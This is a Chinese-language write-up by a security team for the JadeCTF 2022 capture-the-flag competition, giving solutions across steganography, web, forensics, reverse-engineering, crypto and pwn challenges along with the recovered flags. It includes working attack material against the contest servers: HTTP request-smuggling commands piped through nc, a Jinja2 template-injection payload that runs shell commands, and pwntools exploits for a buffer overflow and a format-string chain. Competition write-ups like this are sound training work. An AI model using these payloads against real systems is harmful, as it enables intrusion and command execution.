点击蓝字
关注我们
声明
本文作者:CTF战队
本文字数:8900
阅读时长:约23分钟
附件/链接:点击查看原文下载
本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。
狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
ctf.wgpsec.org
前言
比赛信息
2022-10-21 14:30 ~ 2022-10-23 02:30
平台:https://jadectf.concetto.in/challenges
本文中提到的部分附件关注公众回复 JadeCTF 获取
STEG
AVENGERS ASSEMBLE!
gaps –image=out.jpg –generations=40 –population=600 –size=60
jadeCTF{scr4mbl3d_w3_f4ll_un1t3d_w3_st4nd}
WEB
ULTRA BABY WEB
BABY WEB
8是固定的n,21是固定的_,有些字母应该是不会变的
import requests
url = "http://34.76.206.46:10008/?page="
flag = ""
for i in range(1,999999):
r1 = requests.get(url+str(i))
r2 = requests.get(url+str(i))
r3 = requests.get(url + str(i))
if(r1.text == r2.text == r3.text):
flag = flag + r3.text
print(i)
print(flag)
斐波那契数列
import requests
url = "http://34.76.206.46:10008/?page="
flag = ""
def fib(n):
a, b = 1, 1
for i in range(n - 1):
a, b = b, a + b
return a
for i in range(2,100):
r1 = requests.get(url+str(fib(i)))
flag = flag + r1.text
print(flag)
GREEN COFFEE
/internal 提示只允许内部网络访问
Server为 gunicorn/20.0.4 有个请求走私,利用走私访问一下这个路由
echo -en "GET / HTTP/1.1rnHost: 34.76.206.46:10014rnContent-Length: 85rnSec-Websocket-Key1: xrnrnxxxxxxxxGET /internal?username=n00b HTTP/1.1rnHost: localhostrnContent-Length: 35rnrnGET / HTTP/1.1rnHost: localhostrnrn" | nc 34.76.206.46 10014
SSTI
echo -en "GET /cat HTTP/1.1rnHost: 34.76.206.46:10014rnContent-Length: 96rnSec-Websocket-Key1: xrnrnxxxxxxxxGET /internal?username=%7b%7b9*9%7d%7d HTTP/1.1rnHost: localhostrnContent-Length: 36rnrnGET /c HTTP/1.1rnHost: localhostrnrn" | nc 34.76.206.46 10014
很多时候返回404,可能是网络问题?很不稳定
python 算一下长度,用 lipsum 的 payload ,url 编码一下替换
{{lipsum.__globals__['os'].popen('cat flag.txt').read()}}
echo -en "GET /cat HTTP/1.1rnHost: 34.76.206.46:10014rnContent-Length: 222rnSec-Websocket-Key1: xrnrnxxxxxxxxGET /internal?username=%7b%7b%6c%69%70%73%75%6d%2e%5f%5f%67%6c%6f%62%61%6c%73%5f%5f%5b%27%6f%73%27%5d%2e%70%6f%70%65%6e%28%27%6c%73%27%29%2e%72%65%61%64%28%29%7d%7d HTTP/1.1rnHost: localhostrnContent-Length: 36rnrnGET /c HTTP/1.1rnHost: localhostrnrn" | nc 34.76.206.46 10014
echo -en "GET /cat HTTP/1.1rnHost: 34.76.206.46:10014rnContent-Length: 252rnSec-Websocket-Key1: xrnrnxxxxxxxxGET /internal?username=%7b%7b%6c%69%70%73%75%6d%2e%5f%5f%67%6c%6f%62%61%6c%73%5f%5f%5b%27%6f%73%27%5d%2e%70%6f%70%65%6e%28%27%63%61%74%20%66%6c%61%67%2e%74%78%74%27%29%2e%72%65%61%64%28%29%7d%7d HTTP/1.1rnHost: localhostrnContent-Length: 36rnrnGET /c HTTP/1.1rnHost: localhostrnrn" | nc 34.76.206.46 10014
DFIR
CALL SANDEEP
python vol.py -f ./workspace/sandeep.raw
--profile=Win7SP1x64 dumpfiles
-Q 0x000000007ed6c9c0 -D ./workspace/
修文件头
得到
python vol.py -f ./workspace/sandeep.raw
--profile=Win7SP1x64
dumpfiles -Q 0x000000007dec85f0
-D ./workspace/
得到
From - Thu, 20 Oct 2022 05:34:22 GMT
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00800000
Message-ID: <80466942-4a56-c2e7-1666-501[email protected]>
Date: Wed, 19 Oct 2022 22:34:18 -0700
MIME-Version: 1.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:102.0) Gecko/20100101
Thunderbird/102.3.3
Content-Language: en-US
To: [email protected]
From: Jade Stoner <[email protected]>
Subject: Thank You
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
Thanks for inviting me bro.I will be there in time.
From - Thu, 20 Oct 2022 05:44:13 GMT
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00800000
Message-ID: <3075f4bc-8f46-efaf-029c-1e88[email protected]>
Date: Wed, 19 Oct 2022 22:44:09 -0700
MIME-Version: 1.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:102.0) Gecko/20100101
Thunderbird/102.3.3
Content-Language: en-US
To: [email protected]
From: Jade Stoner <[email protected]>
Subject: Important
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
Hi bro!!
Here is the code to contact Sandeep:
NWIyYjdmMDUyMzczMDU2MTFmMzM2ODIxNGQzYTYwMWQ0MzI1NzQwZg==
I hope you are ready for the party and don't forget to decode it
From - Thu, 20 Oct 2022 05:44:50 GMT
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00800000
Message-ID: <[email protected]>
Date: Wed, 19 Oct 2022 22:44:47 -0700
MIME-Version: 1.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:102.0) Gecko/20100101
Thunderbird/102.3.3
Content-Language: en-US
To: [email protected]
From: Jade Stoner <[email protected]>
Subject: hint
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 8bit
In case, you are having any trouble to decode it.Here's your hint.
int main() {
char flag[] = "XXXXXXXXXX";
int len = strlen(flag);
for (int i = 0; i < len; i++) {
if (i > 0) flag[i] ^= flag[i-1];
flag[i] ^= flag[i] >> 4;
flag[i] ^= flag[i] >> 3;
flag[i] ^= flag[i] >> 2;
flag[i] ^= flag[i] >> 1;
printf("%02x", (unsigned char)flag[i]);
}
return 0;
}
解密
import base64
import binascii
import string
res = b"NWIyYjdmMDUyMzczMDU2MTFmMzM2ODIxNGQzYTYwMWQ0MzI1NzQwZg=="
res = base64.b64decode(res)
out = binascii.unhexlify(res).decode()
def check_res(ccflag):
cflag = ccflag.copy()
for i in range(0, len(cflag)):
cflag[i] = chr(cflag[i])
print(''.join(cflag))
for i in range(0, len(cflag)):
cflag[i] = ord(cflag[i])
digest = ""
for i in range(0, len(cflag)):
if (i > 0):
cflag[i] ^= cflag[i-1]
cflag[i] ^= cflag[i] >> 4
cflag[i] ^= cflag[i] >> 3
cflag[i] ^= cflag[i] >> 2
cflag[i] ^= cflag[i] >> 1
digest += "%02x" % cflag[i]
print("digest =", digest)
def isprint(num):
return 32 <= ord(num) <= 126
def dfs(gflag, idx):
if idx == len(out):
check_res(gflag)
return
for j in range(0x20, 126):
tmp = j
if idx > 0:
tmp ^= ord(out[idx - 1])
tmp ^= tmp >> 4
tmp ^= tmp >> 3
tmp ^= tmp >> 2
tmp ^= tmp >> 1
if tmp == ord(out[idx]):
print(idx, "out[i] =", out[idx], hex(ord(out[idx])))
if not isprint(chr(j)):
return
eflag = gflag.copy()
eflag[idx] = j
dfs(eflag, idx + 1)
def main(flag00):
flag = [0] * len(out)
for i in range(0, len(flag00)):
flag[i] = ord(flag00[i])
dfs(flag, len(flag00))
# main
main("y")
得到 ybbx1at_s0e_Fnaqrrc,之后需要凯撒加密得到 look1ng_f0r_Sandeep
jctf{p34rl_1s_look1ng_f0r_Sandeep}
AutoCAD
crc报错
改宽高从stegsolve看内容
LM10
http协议中有图片 提取获得结果 不要点开油管视频 是诈骗陷阱
Misc
WELCOME
READ THE RULES
Reverse
DENJI EX-MAKIMA
AES CBC模式加密key和iv都给了 开了反调试
import base64
from Crypto.Cipher import AES, DES
with open('./file.fun', 'rb') as f:
c = f.read()
key = base64.b64decode("OoIsAwwF32cICQoLDA0ODe==")
iv = [0,1,0,3,5,3,0,1,0,0,2,0,6,7,6,0]
iv = bytes(iv)
# print(iv)
cipher = AES.new(key, DES.MODE_CBC, iv)
m = cipher.decrypt(c)
print(m.decode()) #jadeCTF{j1gs4w_puzzl3_1s_n0t_s0_34sy}
with open('flag.txt','wb') as f:
f.write(m)
Crypto
Hands
jadeCTF{cryptoisfunorisit}
PWN
babypwn
exp
from pwn import *
p = remote('34.76.206.46',10002)
# p = process('./babypwn')
py = 'a'*520 + p64(0x0000000000400746)
p.sendline(py)
p.interactive()
jadeCTF{buff3r_0v3rfl0ws_4r3_d4ng3r0u5}
Love Calculator
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
debug = 2
context(arch='amd64', endian='el', os='linux')
# context.terminal = ['tmux','splitw','-h', '-l', '100']
context.log_level = 'debug'
if debug == 1:
p = process(['./chall'])
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)
else:
p = remote('34.76.206.46', 10005)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)
elf = ELF('./chall', checksec=False)
pd = b"binLep"
p.sendlineafter(b'Please enter your name: ', pd)
p.sendlineafter(b'Please choose what you would like to do: ', b'2')
pd = b''
pd += b'a' * 0x78
pd += p64(next(elf.search(asm("ret"))))
pd += p64(elf.sym['you_cant_see_me'])
pd += p64(next(elf.search(asm("ret"))))
pd += p64(elf.sym['you_cant_see_me'])
pd += p64(elf.sym['win'])
p.sendlineafter(b'Enter the name of the lucky one ;): ', pd)
p.sendlineafter(b'Wh0 are you?n', b"%17$p.tmp")
p.recvuntil(b'Nice name it 1s: ')
# gdb.attach(p, "b *0x400A01nc")
stack = int(p.recvuntil(b'.tmp', drop=True), 16) + 0x0c
success("stack = " + hex(stack))
pd = b'aaa%8$n'
pd = pd.ljust(0x10, b"x00")
pd += p64(stack)
p.sendlineafter(b'Wh0 are you?n', pd)
p.interactive()
后记
作者
CTF战队
扫描关注公众号回复加群
和师傅们一起讨论研究~
长
按
关
注
WgpSec狼组安全团队
微信号:wgpsec
Twitter:@wgpsec
原文始发于微信公众号(WgpSec狼组安全团队):Jade CTF WP
